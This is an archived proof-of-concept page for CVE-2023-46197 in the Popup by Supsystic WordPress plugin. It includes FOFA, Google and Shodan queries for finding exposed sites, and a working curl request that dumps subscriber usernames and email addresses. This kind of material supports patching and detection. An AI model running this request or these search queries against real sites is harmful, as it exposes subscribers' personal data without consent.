Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-46197 PoC — WordPress Popup by Supsystic plugin <= 1.10.19 - Unauthenticated Subscriber Email Addresses Disclosure

Source
https://github.com/RandomRobbieBF/CVE-2023-46197
Associated Vulnerability
Title:WordPress Popup by Supsystic plugin <= 1.10.19 - Unauthenticated Subscriber Email Addresses Disclosure (CVE-2023-46197)
Description:Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in supsystic.Com Popup by Supsystic allows Relative Path Traversal.This issue affects Popup by Supsystic: from n/a through 1.10.19.
Description
Popup by Supsystic <= 1.10.19 - Missing Authorization to Sensitive Information Exposure
Readme
# CVE-2023-46197
### Popup by Supsystic &lt;= 1.10.19 - Missing Authorization to Sensitive Information Exposure


### Description
"The Popup by Supsystic plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.10.19 via the getWpCsvList action. This makes it possible for authenticated attackers with subscriber level access or higher to extract sensitive data including subscriber email addresses."

```
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f458663f-6b1a-4acd-b2db-c66d7a915ab7?source=api-prod
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2023-46197
  metadata:
    fofa-query: "wp-content/plugins/popup-by-supsystic/"
    google-query: inurl:"/wp-content/plugins/popup-by-supsystic/"
    shodan-query: 'vuln:CVE-2023-46197'
    slug: 'popup-by-supsystic'
```

Proof of concept:
---

```
curl "http://wordpress.lan/?mod=subscribe&action=getWpCsvList&pl=pps"

"Username";"Email";"Activated";"PopUp ID";"Date Created"
```
File Snapshot

 [4.0K]  /data/pocs/4b0d7a9a1a03a0f64ab7009c75b704d1db9ef1f0
├── [1.5K]  CVE-2023-46197.yaml
├── [ 11K]  LICENSE
└── [1.1K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →